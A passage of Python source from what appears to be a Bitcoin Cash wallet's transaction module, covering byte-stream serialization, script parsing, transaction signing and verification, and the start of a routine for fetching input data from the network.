# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
# Note: The deserialization code originally comes from ABE.
from .util import print_error, profiler
from .caches import ExpiringCache
from .bitcoin import *
from .address import (PublicKey, Address, Script, ScriptOutput, hash160,
UnknownAddress, OpCodes as opcodes)
from . import schnorr
from . import util
import struct
import warnings
#
# Workalike python implementation of Bitcoin's CDataStream class.
#
from .keystore import xpubkey_to_address, xpubkey_to_pubkey
NO_SIGNATURE = 'ff'
class SerializationError(Exception):
""" Thrown when there's a problem deserializing or serializing """
class InputValueMissing(Exception):
""" thrown when the value of an input is needed but not present """
class BCDataStream(object):
def __init__(self):
self.input = None
self.read_cursor = 0
def clear(self):
self.input = None
self.read_cursor = 0
def write(self, _bytes): # Initialize with string of _bytes
if self.input is None:
self.input = bytearray(_bytes)
else:
self.input += bytearray(_bytes)
def read_string(self, encoding='ascii'):
# Strings are encoded depending on length:
# 0 to 252 : 1-byte-length followed by bytes (if any)
# 253 to 65,535 : byte'253' 2-byte-length followed by bytes
# 65,536 to 4,294,967,295 : byte '254' 4-byte-length followed by bytes
# ... and the Bitcoin client is coded to understand:
# greater than 4,294,967,295 : byte '255' 8-byte-length followed by bytes of string
# ... but I don't think it actually handles any strings that big.
if self.input is None:
raise SerializationError("call write(bytes) before trying to deserialize")
length = self.read_compact_size()
return self.read_bytes(length).decode(encoding)
def write_string(self, string, encoding='ascii'):
string = to_bytes(string, encoding)
# Length-encoded as with read-string
self.write_compact_size(len(string))
self.write(string)
def read_bytes(self, length):
try:
result = self.input[self.read_cursor:self.read_cursor+length]
self.read_cursor += length
return result
except IndexError:
raise SerializationError("attempt to read past end of buffer")
return ''
def can_read_more(self) -> bool:
if not self.input:
return False
return self.read_cursor < len(self.input)
def read_boolean(self): return self.read_bytes(1)[0] != chr(0)
def read_int16(self): return self._read_num('<h')
def read_uint16(self): return self._read_num('<H')
def read_int32(self): return self._read_num('<i')
def read_uint32(self): return self._read_num('<I')
def read_int64(self): return self._read_num('<q')
def read_uint64(self): return self._read_num('<Q')
def write_boolean(self, val): return self.write(chr(1) if val else chr(0))
def write_int16(self, val): return self._write_num('<h', val)
def write_uint16(self, val): return self._write_num('<H', val)
def write_int32(self, val): return self._write_num('<i', val)
def write_uint32(self, val): return self._write_num('<I', val)
def write_int64(self, val): return self._write_num('<q', val)
def write_uint64(self, val): return self._write_num('<Q', val)
def read_compact_size(self):
try:
size = self.input[self.read_cursor]
self.read_cursor += 1
if size == 253:
size = self._read_num('<H')
elif size == 254:
size = self._read_num('<I')
elif size == 255:
size = self._read_num('<Q')
return size
except IndexError:
raise SerializationError("attempt to read past end of buffer")
def write_compact_size(self, size):
if size < 0:
raise SerializationError("attempt to write size < 0")
elif size < 253:
self.write(bytes([size]))
elif size < 2**16:
self.write(b'\xfd')
self._write_num('<H', size)
elif size < 2**32:
self.write(b'\xfe')
self._write_num('<I', size)
elif size < 2**64:
self.write(b'\xff')
self._write_num('<Q', size)
def _read_num(self, format):
try:
(i,) = struct.unpack_from(format, self.input, self.read_cursor)
self.read_cursor += struct.calcsize(format)
except Exception as e:
raise SerializationError(e)
return i
def _write_num(self, format, num):
s = struct.pack(format, num)
self.write(s)
# This function comes from bitcointools, bct-LICENSE.txt.
def long_hex(bytes):
return bytes.encode('hex_codec')
# This function comes from bitcointools, bct-LICENSE.txt.
def short_hex(bytes):
t = bytes.encode('hex_codec')
if len(t) < 11:
return t
return t[0:4]+"..."+t[-4:]
def match_decoded(decoded, to_match):
if len(decoded) != len(to_match):
return False;
for i in range(len(decoded)):
if to_match[i] == opcodes.OP_PUSHDATA4 and decoded[i][0] <= opcodes.OP_PUSHDATA4 and decoded[i][0]>0:
continue # Opcodes below OP_PUSHDATA4 all just push data onto stack, and are equivalent.
if to_match[i] != decoded[i][0]:
return False
return True
def parse_sig(x_sig):
return [None if x == NO_SIGNATURE else x for x in x_sig]
def safe_parse_pubkey(x):
try:
return xpubkey_to_pubkey(x)
except:
return x
def parse_scriptSig(d, _bytes):
try:
decoded = Script.get_ops(_bytes)
except Exception as e:
# coinbase transactions raise an exception
print_error("cannot find address in input script", bh2u(_bytes))
return
match = [ opcodes.OP_PUSHDATA4 ]
if match_decoded(decoded, match):
item = decoded[0][1]
# payto_pubkey
d['type'] = 'p2pk'
d['signatures'] = [bh2u(item)]
d['num_sig'] = 1
d['x_pubkeys'] = ["(pubkey)"]
d['pubkeys'] = ["(pubkey)"]
return
# non-generated TxIn transactions push a signature
# (seventy-something bytes) and then their public key
# (65 bytes) onto the stack:
match = [ opcodes.OP_PUSHDATA4, opcodes.OP_PUSHDATA4 ]
if match_decoded(decoded, match):
sig = bh2u(decoded[0][1])
x_pubkey = bh2u(decoded[1][1])
try:
signatures = parse_sig([sig])
pubkey, address = xpubkey_to_address(x_pubkey)
except:
print_error("cannot find address in input script", bh2u(_bytes))
return
d['type'] = 'p2pkh'
d['signatures'] = signatures
d['x_pubkeys'] = [x_pubkey]
d['num_sig'] = 1
d['pubkeys'] = [pubkey]
d['address'] = address
return
# p2sh transaction, m of n
match = [ opcodes.OP_0 ] + [ opcodes.OP_PUSHDATA4 ] * (len(decoded) - 1)
if not match_decoded(decoded, match):
print_error("cannot find address in input script", bh2u(_bytes))
return
x_sig = [bh2u(x[1]) for x in decoded[1:-1]]
m, n, x_pubkeys, pubkeys, redeemScript = parse_redeemScript(decoded[-1][1])
# write result in d
d['type'] = 'p2sh'
d['num_sig'] = m
d['signatures'] = parse_sig(x_sig)
d['x_pubkeys'] = x_pubkeys
d['pubkeys'] = pubkeys
d['redeemScript'] = redeemScript
d['address'] = Address.from_P2SH_hash(hash160(redeemScript))
def parse_redeemScript(s):
dec2 = Script.get_ops(s)
# the following throw exception when redeemscript has one or zero opcodes
m = dec2[0][0] - opcodes.OP_1 + 1
n = dec2[-2][0] - opcodes.OP_1 + 1
op_m = opcodes.OP_1 + m - 1
op_n = opcodes.OP_1 + n - 1
match_multisig = [ op_m ] + [opcodes.OP_PUSHDATA4]*n + [ op_n, opcodes.OP_CHECKMULTISIG ]
if not match_decoded(dec2, match_multisig):
# causes exception in caller when mismatched
print_error("cannot find address in input script", bh2u(s))
return
x_pubkeys = [bh2u(x[1]) for x in dec2[1:-2]]
pubkeys = [safe_parse_pubkey(x) for x in x_pubkeys]
redeemScript = Script.multisig_script(m, [bytes.fromhex(p)
for p in pubkeys])
return m, n, x_pubkeys, pubkeys, redeemScript
def get_address_from_output_script(_bytes):
try:
decoded = Script.get_ops(_bytes)
# The Genesis Block, self-payments, and pay-by-IP-address payments look like:
# 65 BYTES:... CHECKSIG
match = [ opcodes.OP_PUSHDATA4, opcodes.OP_CHECKSIG ]
if match_decoded(decoded, match):
return TYPE_PUBKEY, PublicKey.from_pubkey(decoded[0][1])
# Pay-by-Bitcoin-address TxOuts look like:
# DUP HASH160 20 BYTES:... EQUALVERIFY CHECKSIG
match = [ opcodes.OP_DUP, opcodes.OP_HASH160, opcodes.OP_PUSHDATA4, opcodes.OP_EQUALVERIFY, opcodes.OP_CHECKSIG ]
if match_decoded(decoded, match):
return TYPE_ADDRESS, Address.from_P2PKH_hash(decoded[2][1])
# p2sh
match = [ opcodes.OP_HASH160, opcodes.OP_PUSHDATA4, opcodes.OP_EQUAL ]
if match_decoded(decoded, match):
return TYPE_ADDRESS, Address.from_P2SH_hash(decoded[1][1])
except Exception as e:
print_error('{}: Failed to parse tx ouptut {}. Exception was: {}'.format(__name__, _bytes.hex(), repr(e)))
pass
return TYPE_SCRIPT, ScriptOutput(bytes(_bytes))
def parse_input(vds):
d = {}
prevout_hash = hash_encode(vds.read_bytes(32))
prevout_n = vds.read_uint32()
scriptSig = vds.read_bytes(vds.read_compact_size())
sequence = vds.read_uint32()
d['prevout_hash'] = prevout_hash
d['prevout_n'] = prevout_n
d['sequence'] = sequence
d['address'] = UnknownAddress()
if prevout_hash == '00'*32:
d['type'] = 'coinbase'
d['scriptSig'] = bh2u(scriptSig)
else:
d['x_pubkeys'] = []
d['pubkeys'] = []
d['signatures'] = {}
d['address'] = None
d['type'] = 'unknown'
d['num_sig'] = 0
d['scriptSig'] = bh2u(scriptSig)
try:
parse_scriptSig(d, scriptSig)
except Exception as e:
print_error('{}: Failed to parse tx input {}:{}, probably a p2sh (non multisig?). Exception was: {}'.format(__name__, prevout_hash, prevout_n, repr(e)))
# that whole heuristic codepath is fragile; just ignore it when it dies.
# failing tx examples:
# 1c671eb25a20aaff28b2fa4254003c201155b54c73ac7cf9c309d835deed85ee
# 08e1026eaf044127d7103415570afd564dfac3131d7a5e4b645f591cd349bb2c
# override these once more just to make sure
d['address'] = UnknownAddress()
d['type'] = 'unknown'
if not Transaction.is_txin_complete(d):
d['value'] = vds.read_uint64()
return d
def parse_output(vds, i):
d = {}
d['value'] = vds.read_int64()
scriptPubKey = vds.read_bytes(vds.read_compact_size())
d['type'], d['address'] = get_address_from_output_script(scriptPubKey)
d['scriptPubKey'] = bh2u(scriptPubKey)
d['prevout_n'] = i
return d
def deserialize(raw):
vds = BCDataStream()
vds.write(bfh(raw))
d = {}
start = vds.read_cursor
d['version'] = vds.read_int32()
n_vin = vds.read_compact_size()
assert n_vin != 0
d['inputs'] = [parse_input(vds) for i in range(n_vin)]
n_vout = vds.read_compact_size()
assert n_vout != 0
d['outputs'] = [parse_output(vds, i) for i in range(n_vout)]
d['lockTime'] = vds.read_uint32()
if vds.can_read_more():
raise SerializationError('extra junk at the end')
return d
# pay & redeem scripts
def multisig_script(public_keys, m):
n = len(public_keys)
assert n <= 15
assert m <= n
op_m = format(opcodes.OP_1 + m - 1, 'x')
op_n = format(opcodes.OP_1 + n - 1, 'x')
keylist = [op_push(len(k)//2) + k for k in public_keys]
return op_m + ''.join(keylist) + op_n + 'ae'
class Transaction:
SIGHASH_FORKID = 0x40 # do not use this; deprecated
FORKID = 0x000000 # do not use this; deprecated
def __str__(self):
if self.raw is None:
self.raw = self.serialize()
return self.raw
def __init__(self, raw, sign_schnorr=False):
if raw is None:
self.raw = None
elif isinstance(raw, str):
self.raw = raw.strip() if raw else None
elif isinstance(raw, dict):
self.raw = raw['hex']
else:
raise BaseException("cannot initialize transaction", raw)
self._inputs = None
self._outputs = None
self.locktime = 0
self.version = 1
self._sign_schnorr = sign_schnorr
# attribute used by HW wallets to tell the hw keystore about any outputs
# in the tx that are to self (change), etc. See wallet.py add_hw_info
# which writes to this dict and the various hw wallet plugins which
# read this dict.
self.output_info = dict()
# Ephemeral meta-data used internally to keep track of interesting
# things. This is currently written-to by coinchooser to tell UI code
# about 'dust_to_fee', which is change that's too small to go to change
# outputs (below dust threshold) and needed to go to the fee.
#
# It is also used to store the 'fetched_inputs' which are asynchronously
# retrieved inputs (by retrieving prevout_hash tx's), see
#`fetch_input_data`.
#
# Values in this dict are advisory only and may or may not always be
# there!
self.ephemeral = dict()
def set_sign_schnorr(self, b):
self._sign_schnorr = b
def update(self, raw):
self.raw = raw
self._inputs = None
self.deserialize()
def inputs(self):
if self._inputs is None:
self.deserialize()
return self._inputs
def outputs(self):
if self._outputs is None:
self.deserialize()
return self._outputs
@classmethod
def get_sorted_pubkeys(self, txin):
# sort pubkeys and x_pubkeys, using the order of pubkeys
# Note: this function is CRITICAL to get the correct order of pubkeys in
# multisignatures; avoid changing.
x_pubkeys = txin['x_pubkeys']
pubkeys = txin.get('pubkeys')
if pubkeys is None:
pubkeys = [xpubkey_to_pubkey(x) for x in x_pubkeys]
pubkeys, x_pubkeys = zip(*sorted(zip(pubkeys, x_pubkeys)))
txin['pubkeys'] = pubkeys = list(pubkeys)
txin['x_pubkeys'] = x_pubkeys = list(x_pubkeys)
return pubkeys, x_pubkeys
def update_signatures(self, signatures):
"""Add new signatures to a transaction
`signatures` is expected to be a list of hex encoded sig strings with
*no* sighash byte at the end (implicitly always 0x41 (SIGHASH_FORKID|SIGHASH_ALL);
will be added by this function).
signatures[i] is intended for self._inputs[i].
The signature will be matched with the appropriate pubkey automatically
in the case of multisignature wallets.
This function is used by the Trezor, KeepKey, etc to update the
transaction with signatures form the device.
Note this function supports both Schnorr and ECDSA signatures, but as
yet no hardware wallets are signing Schnorr.
"""
if self.is_complete():
return
if not isinstance(signatures, (tuple, list)):
raise Exception('API changed: update_signatures expects a list.')
if len(self.inputs()) != len(signatures):
raise Exception('expected {} signatures; got {}'.format(len(self.inputs()), len(signatures)))
for i, txin in enumerate(self.inputs()):
pubkeys, x_pubkeys = self.get_sorted_pubkeys(txin)
sig = signatures[i]
if not isinstance(sig, str):
raise ValueError("sig was bytes, expected string")
# sig_final is the signature with the sighashbyte at the end (0x41)
sig_final = sig + '41'
if sig_final in txin.get('signatures'):
# skip if we already have this signature
continue
pre_hash = Hash(bfh(self.serialize_preimage(i)))
sig_bytes = bfh(sig)
added = False
reason = []
for j, pubkey in enumerate(pubkeys):
# see which pubkey matches this sig (in non-multisig only 1 pubkey, in multisig may be multiple pubkeys)
if self.verify_signature(bfh(pubkey), sig_bytes, pre_hash, reason):
print_error("adding sig", i, j, pubkey, sig_final)
self._inputs[i]['signatures'][j] = sig_final
added = True
if not added:
resn = ', '.join(reversed(reason)) if reason else ''
print_error("failed to add signature {} for any pubkey for reason(s): '{}' ; pubkey(s) / sig / pre_hash = ".format(i, resn),
pubkeys, '/', sig, '/', bh2u(pre_hash))
# redo raw
self.raw = self.serialize()
def is_schnorr_signed(self, input_idx):
''' Return True IFF any of the signatures for a particular input
are Schnorr signatures (Schnorr signatures are always 64 bytes + 1) '''
if (isinstance(self._inputs, (list, tuple))
and input_idx < len(self._inputs)
and self._inputs[input_idx]):
# Schnorr sigs are always 64 bytes. However the sig has a hash byte
# at the end, so that's 65. Plus we are hex encoded, so 65*2=130
return any(isinstance(sig, (str, bytes)) and len(sig) == 130
for sig in self._inputs[input_idx].get('signatures', []))
return False
def deserialize(self):
if self.raw is None:
return
if self._inputs is not None:
return
d = deserialize(self.raw)
self._inputs = d['inputs']
self._outputs = [(x['type'], x['address'], x['value']) for x in d['outputs']]
assert all(isinstance(output[1], (PublicKey, Address, ScriptOutput))
for output in self._outputs)
self.locktime = d['lockTime']
self.version = d['version']
return d
@classmethod
def from_io(klass, inputs, outputs, locktime=0, sign_schnorr=False):
assert all(isinstance(output[1], (PublicKey, Address, ScriptOutput))
for output in outputs)
self = klass(None)
self._inputs = inputs
self._outputs = outputs.copy()
self.locktime = locktime
self.set_sign_schnorr(sign_schnorr)
return self
@classmethod
def pay_script(self, output):
return output.to_script().hex()
@classmethod
def estimate_pubkey_size_from_x_pubkey(cls, x_pubkey):
try:
if x_pubkey[0:2] in ['02', '03']: # compressed pubkey
return 0x21
elif x_pubkey[0:2] == '04': # uncompressed pubkey
return 0x41
elif x_pubkey[0:2] == 'ff': # bip32 extended pubkey
return 0x21
elif x_pubkey[0:2] == 'fe': # old electrum extended pubkey
return 0x41
except Exception as e:
pass
return 0x21 # just guess it is compressed
@classmethod
def estimate_pubkey_size_for_txin(cls, txin):
pubkeys = txin.get('pubkeys', [])
x_pubkeys = txin.get('x_pubkeys', [])
if pubkeys and len(pubkeys) > 0:
return cls.estimate_pubkey_size_from_x_pubkey(pubkeys[0])
elif x_pubkeys and len(x_pubkeys) > 0:
return cls.estimate_pubkey_size_from_x_pubkey(x_pubkeys[0])
else:
return 0x21 # just guess it is compressed
@classmethod
def get_siglist(self, txin, estimate_size=False, sign_schnorr=False):
# if we have enough signatures, we use the actual pubkeys
# otherwise, use extended pubkeys (with bip32 derivation)
num_sig = txin.get('num_sig', 1)
if estimate_size:
pubkey_size = self.estimate_pubkey_size_for_txin(txin)
pk_list = ["00" * pubkey_size] * len(txin.get('x_pubkeys', [None]))
# we assume that signature will be 0x48 bytes long if ECDSA, 0x41 if Schnorr
if sign_schnorr:
siglen = 0x41
else:
siglen = 0x48
sig_list = [ "00" * siglen ] * num_sig
else:
pubkeys, x_pubkeys = self.get_sorted_pubkeys(txin)
x_signatures = txin['signatures']
signatures = list(filter(None, x_signatures))
is_complete = len(signatures) == num_sig
if is_complete:
pk_list = pubkeys
sig_list = signatures
else:
pk_list = x_pubkeys
sig_list = [sig if sig else NO_SIGNATURE for sig in x_signatures]
return pk_list, sig_list
@classmethod
def input_script(self, txin, estimate_size=False, sign_schnorr=False):
_type = txin['type']
if _type == 'coinbase':
return txin['scriptSig']
pubkeys, sig_list = self.get_siglist(txin, estimate_size, sign_schnorr=sign_schnorr)
script = ''.join(push_script(x) for x in sig_list)
if _type == 'p2pk':
pass
elif _type == 'p2sh':
# put op_0 before script
script = '00' + script
redeem_script = multisig_script(pubkeys, txin['num_sig'])
script += push_script(redeem_script)
elif _type == 'p2pkh':
script += push_script(pubkeys[0])
elif _type == 'unknown':
return txin['scriptSig']
return script
@classmethod
def is_txin_complete(self, txin):
num_sig = txin.get('num_sig', 1)
x_signatures = txin['signatures']
signatures = list(filter(None, x_signatures))
return len(signatures) == num_sig
@classmethod
def get_preimage_script(self, txin):
_type = txin['type']
if _type == 'p2pkh':
return txin['address'].to_script().hex()
elif _type == 'p2sh':
pubkeys, x_pubkeys = self.get_sorted_pubkeys(txin)
return multisig_script(pubkeys, txin['num_sig'])
elif _type == 'p2pk':
pubkey = txin['pubkeys'][0]
return public_key_to_p2pk_script(pubkey)
elif _type == 'unknown':
# this approach enables most P2SH smart contracts (but take care if using OP_CODESEPARATOR)
return txin['scriptCode']
else:
raise RuntimeError('Unknown txin type', _type)
@classmethod
def serialize_outpoint(self, txin):
return bh2u(bfh(txin['prevout_hash'])[::-1]) + int_to_hex(txin['prevout_n'], 4)
@classmethod
def serialize_input(self, txin, script, estimate_size=False):
# Prev hash and index
s = self.serialize_outpoint(txin)
# Script length, script, sequence
s += var_int(len(script)//2)
s += script
s += int_to_hex(txin.get('sequence', 0xffffffff - 1), 4)
# offline signing needs to know the input value
if ('value' in txin # Legacy txs
and not (estimate_size or self.is_txin_complete(txin))):
s += int_to_hex(txin['value'], 8)
return s
def BIP_LI01_sort(self):
# See https://github.com/kristovatlas/rfc/blob/master/bips/bip-li01.mediawiki
self._inputs.sort(key = lambda i: (i['prevout_hash'], i['prevout_n']))
self._outputs.sort(key = lambda o: (o[2], self.pay_script(o[1])))
def serialize_output(self, output):
output_type, addr, amount = output
s = int_to_hex(amount, 8)
script = self.pay_script(addr)
s += var_int(len(script)//2)
s += script
return s
@classmethod
def nHashType(cls):
'''Hash type in hex.'''
warnings.warn("warning: deprecated tx.nHashType()", FutureWarning, stacklevel=2)
return 0x01 | (cls.SIGHASH_FORKID + (cls.FORKID << 8))
def serialize_preimage(self, i, nHashType=0x00000041):
if (nHashType & 0xff) != 0x41:
raise ValueError("other hashtypes not supported; submit a PR to fix this!")
nVersion = int_to_hex(self.version, 4)
nHashType = int_to_hex(nHashType, 4)
nLocktime = int_to_hex(self.locktime, 4)
inputs = self.inputs()
outputs = self.outputs()
txin = inputs[i]
hashPrevouts = bh2u(Hash(bfh(''.join(self.serialize_outpoint(txin) for txin in inputs))))
hashSequence = bh2u(Hash(bfh(''.join(int_to_hex(txin.get('sequence', 0xffffffff - 1), 4) for txin in inputs))))
hashOutputs = bh2u(Hash(bfh(''.join(self.serialize_output(o) for o in outputs))))
outpoint = self.serialize_outpoint(txin)
preimage_script = self.get_preimage_script(txin)
scriptCode = var_int(len(preimage_script) // 2) + preimage_script
try:
amount = int_to_hex(txin['value'], 8)
except KeyError:
raise InputValueMissing
nSequence = int_to_hex(txin.get('sequence', 0xffffffff - 1), 4)
preimage = nVersion + hashPrevouts + hashSequence + outpoint + scriptCode + amount + nSequence + hashOutputs + nLocktime + nHashType
return preimage
def serialize(self, estimate_size=False):
nVersion = int_to_hex(self.version, 4)
nLocktime = int_to_hex(self.locktime, 4)
inputs = self.inputs()
outputs = self.outputs()
txins = var_int(len(inputs)) + ''.join(self.serialize_input(txin, self.input_script(txin, estimate_size, self._sign_schnorr), estimate_size) for txin in inputs)
txouts = var_int(len(outputs)) + ''.join(self.serialize_output(o) for o in outputs)
return nVersion + txins + txouts + nLocktime
def hash(self):
warnings.warn("warning: deprecated tx.hash()", FutureWarning, stacklevel=2)
return self.txid()
def txid(self):
if not self.is_complete():
return None
ser = self.serialize()
return self._txid(ser)
@staticmethod
def _txid(raw_hex : str) -> str:
return bh2u(Hash(bfh(raw_hex))[::-1])
def add_inputs(self, inputs):
self._inputs.extend(inputs)
self.raw = None
def add_outputs(self, outputs):
assert all(isinstance(output[1], (PublicKey, Address, ScriptOutput))
for output in outputs)
self._outputs.extend(outputs)
self.raw = None
def input_value(self):
return sum(x['value'] for x in (self.fetched_inputs() or self.inputs()))
def output_value(self):
return sum(val for tp, addr, val in self.outputs())
def get_fee(self):
return self.input_value() - self.output_value()
@profiler
def estimated_size(self):
'''Return an estimated tx size in bytes.'''
return (len(self.serialize(True)) // 2 if not self.is_complete() or self.raw is None
else len(self.raw) // 2) # ASCII hex string
@classmethod
def estimated_input_size(self, txin, sign_schnorr=False):
'''Return an estimated of serialized input size in bytes.'''
script = self.input_script(txin, True, sign_schnorr=sign_schnorr)
return len(self.serialize_input(txin, script, True)) // 2 # ASCII hex string
def signature_count(self):
r = 0
s = 0
for txin in self.inputs():
if txin['type'] == 'coinbase':
continue
signatures = list(filter(None, txin.get('signatures',[])))
s += len(signatures)
r += txin.get('num_sig',-1)
return s, r
def is_complete(self):
s, r = self.signature_count()
return r == s
@staticmethod
def verify_signature(pubkey, sig, msghash, reason=None):
''' Given a pubkey (bytes), signature (bytes -- without sighash byte),
and a sha256d message digest, returns True iff the signature is good
for the given public key, False otherwise. Does not raise normally
unless given bad or garbage arguments.
Optional arg 'reason' should be a list which will have a string pushed
at the front (failure reason) on False return. '''
if (any(not arg or not isinstance(arg, bytes) for arg in (pubkey, sig, msghash))
or len(msghash) != 32):
raise ValueError('bad arguments to verify_signature')
if len(sig) == 64:
# Schnorr signatures are always exactly 64 bytes
return schnorr.verify(pubkey, sig, msghash)
else:
from ecdsa import BadSignatureError, BadDigestError
from ecdsa.der import UnexpectedDER
# ECDSA signature
try:
pubkey_point = ser_to_point(pubkey)
vk = MyVerifyingKey.from_public_point(pubkey_point, curve=SECP256k1)
if vk.verify_digest(sig, msghash, sigdecode = ecdsa.util.sigdecode_der):
return True
except (AssertionError, ValueError, TypeError,
BadSignatureError, BadDigestError, UnexpectedDER) as e:
# ser_to_point will fail if pubkey is off-curve, infinity, or garbage.
# verify_digest may also raise BadDigestError and BadSignatureError
if isinstance(reason, list):
reason.insert(0, repr(e))
except BaseException as e:
print_error("[Transaction.verify_signature] unexpected exception", repr(e))
if isinstance(reason, list):
reason.insert(0, repr(e))
return False
@staticmethod
def _ecdsa_sign(sec, pre_hash):
pkey = regenerate_key(sec)
secexp = pkey.secret
private_key = MySigningKey.from_secret_exponent(secexp, curve = SECP256k1)
public_key = private_key.get_verifying_key()
sig = private_key.sign_digest_deterministic(pre_hash, hashfunc=hashlib.sha256, sigencode = ecdsa.util.sigencode_der)
assert public_key.verify_digest(sig, pre_hash, sigdecode = ecdsa.util.sigdecode_der)
return sig
@staticmethod
def _schnorr_sign(pubkey, sec, pre_hash):
pubkey = bytes.fromhex(pubkey)
sig = schnorr.sign(sec, pre_hash)
assert schnorr.verify(pubkey, sig, pre_hash) # verify what we just signed
return sig
def sign(self, keypairs):
for i, txin in enumerate(self.inputs()):
num = txin['num_sig']
pubkeys, x_pubkeys = self.get_sorted_pubkeys(txin)
for j, x_pubkey in enumerate(x_pubkeys):
signatures = list(filter(None, txin['signatures']))
if len(signatures) == num:
# txin is complete
break
if x_pubkey in keypairs.keys():
print_error("adding signature for", x_pubkey, "use schnorr?", self._sign_schnorr)
sec, compressed = keypairs.get(x_pubkey)
pubkey = public_key_from_private_key(sec, compressed)
# add signature
nHashType = 0x00000041 # hardcoded, perhaps should be taken from unsigned input dict
pre_hash = Hash(bfh(self.serialize_preimage(i, nHashType)))
if self._sign_schnorr:
sig = self._schnorr_sign(pubkey, sec, pre_hash)
else:
sig = self._ecdsa_sign(sec, pre_hash)
txin['signatures'][j] = bh2u(sig + bytes((nHashType & 0xff,)))
txin['pubkeys'][j] = pubkey # needed for fd keys
self._inputs[i] = txin
print_error("is_complete", self.is_complete())
self.raw = self.serialize()
def get_outputs(self):
"""convert pubkeys to addresses"""
o = []
for type, addr, v in self.outputs():
o.append((addr,v)) # consider using yield (addr, v)
return o
def get_output_addresses(self):
return [addr for addr, val in self.get_outputs()]
def has_address(self, addr):
return (addr in self.get_output_addresses()) or (addr in (tx.get("address") for tx in self.inputs()))
def is_final(self):
return not any([x.get('sequence', 0xffffffff - 1) < 0xffffffff - 1
for x in self.inputs()])
def as_dict(self):
if self.raw is None:
self.raw = self.serialize()
self.deserialize()
out = {
'hex': self.raw,
'complete': self.is_complete(),
'final': self.is_final(),
}
return out
# This cache stores foreign (non-wallet) tx's we fetched from the network
# for the purposes of the "fetch_input_data" mechanism. Its max size has
# been thoughtfully calibrated to provide a decent tradeoff between
# memory consumption and UX.
#
# In even aggressive/pathological cases this cache won't ever exceed
# 100MB even when full. [see ExpiringCache.size_bytes() to test it].
# This is acceptable considering this is Python + Qt and it eats memory
# anyway.. and also this is 2019 ;). Note that all tx's in this cache
# are in the non-deserialized state (hex encoded bytes only) as a memory
# savings optimization. Please maintain that invariant if you modify this
# code, otherwise the cache may grow to 10x memory consumption if you
# put deserialized tx's in here.
_fetched_tx_cache = ExpiringCache(maxlen=1000, name="TransactionFetchCache")
def fetch_input_data(self, wallet, done_callback=None, done_args=tuple(),
prog_callback=None, *, force=False, use_network=True):
'''
Fetch all input data and put it in the 'ephemeral' dictionary, under
'fetched_inputs'. This call potentially initiates fetching of
prevout_hash transactions from the network for all inputs to this tx.
The fetched data is basically used for the Transaction dialog to be able
to display fee, actual address, and amount (value) for tx inputs.
`wallet` should ideally have a network object, but this function still
will work and is still useful if it does not.
`done_callback` is called with `done_args` (only if True was returned),
upon completion. Note that done_callback won't be called if this function
returns False. Also note that done_callback runs in a non-main thread
context and as such, if you want to do GUI work from within it, use
the appropriate Qt signal/slot mechanism to dispatch work to the GUI.
`prog_callback`, if specified, is called periodically to indicate
progress after inputs are retrieved, and it is passed a single arg,
"percent" (eg: 5.1, 10.3, 26.3, 76.1, etc) to indicate percent progress.
Note 1: Results (fetched transactions) are cached, so subsequent
calls to this function for the same transaction are cheap.
Note 2: Multiple, rapid calls to this function will cause the previous
asynchronous fetch operation (if active) to be canceled and only the
latest call will result in the invocation of the done_callback if/when
it completes.
'''
if not self._inputs:
return False
if force:
# forced-run -- start with empty list
inps = []
else:
# may be a new list or list that was already in dict
inps = self.fetched_inputs(require_complete = True)
if len(self._inputs) == len(inps):
# we already have results, don't do anything.
return False
eph = self.ephemeral
eph['fetched_inputs'] = inps = inps.copy() # paranoia: in case another thread is running on this list
# Lazy imports to keep this functionality very self-contained
# These modules are always available so no need to globally import them.
import threading
import queue
import time
from copy import deepcopy
from collections import defaultdict
t0 = time.time()
t = None
cls = __class__
def doIt():
'''
This function is seemingly complex, but it's really conceptually
simple:
1. Fetch all prevouts either from cache (wallet or global tx_cache)
2. Or, if they aren't in either cache, then we will asynchronously
queue the raw tx gets to the network in parallel, across *all*
our connected servers. This is very fast, and spreads the load
around.
Tested with a huge tx of 600+ inputs all coming from different
prevout_hashes on mainnet, and it's super fast:
cd8fcc8ad75267ff9ad314e770a66a9e871be7882b7c05a7e5271c46bfca98bc '''
last_prog = -9999.0
need_dl_txids = defaultdict(list) # the dict of txids we will need to download (wasn't in cache)
def prog(i, prog_total=100):
''' notify interested code about progress '''
nonlocal last_prog
if prog_callback:
prog = ((i+1)*100.0)/prog_total
if prog - last_prog > 5.0:
prog_callback(prog)
last_prog = prog
while eph.get('_fetch') == t and len(inps) < len(self._inputs):
i = len(inps)
inp = deepcopy(self._inputs[i])
typ, prevout_hash, n, addr, value = inp.get('type'), inp.get('prevout_hash'), inp.get('prevout_n'), inp.get('address'), inp.get('value')
if not prevout_hash or n is None:
raise RuntimeError('Missing prevout_hash and/or prevout_n')
if typ != 'coinbase' and (not isinstance(addr, Address) or value is None):
tx = cls.tx_cache_get(prevout_hash) or wallet.transactions.get(prevout_hash)
if tx:
# Tx was in cache or wallet.transactions, proceed
# note that the tx here should be in the "not
# deserialized" state
if tx.raw:
# Note we deserialize a *copy* of the tx so as to
# save memory. We do not want to deserialize the
# cached tx because if we do so, the cache will
# contain a deserialized tx which will take up
# several times the memory when deserialized due to
# Python's memory use being less efficient than the
# binary-only raw bytes. So if you modify this code
# do bear that in mind.
tx = Transaction(tx.raw)
try:
tx.deserialize()
# The below txid check is commented-out as
# we trust wallet tx's and the network
# tx's that fail this check are never
# put in cache anyway.
#txid = tx._txid(tx.raw)
#if txid != prevout_hash: # sanity check
# print_error("fetch_input_data: cached prevout_hash {} != tx.txid() {}, ignoring.".format(prevout_hash, txid))
except Exception as e:
print_error("fetch_input_data: WARNING failed to deserialize {}: {}".format(prevout_hash, repr(e)))
tx = None
else:
tx = None
print_error("fetch_input_data: WARNING cached tx lacked any 'raw' bytes for {}".format(prevout_hash))
# now, examine the deserialized tx, if it's still good
if tx:
if n < len(tx.outputs()):
outp = tx.outputs()[n]
addr, value = outp[1], outp[2]
inp['value'] = value
inp['address'] = addr
print_error("fetch_input_data: fetched cached", i, addr, value)
else:
print_error("fetch_input_data: ** FIXME ** should never happen -- n={} >= len(tx.outputs())={} for prevout {}".format(n, len(tx.outputs()), prevout_hash))
else:
# tx was not in cache or wallet.transactions, mark
# it for download below (this branch can also execute
# in the unlikely case where there was an error above)
need_dl_txids[prevout_hash].append((i, n)) # remember the input# as well as the prevout_n
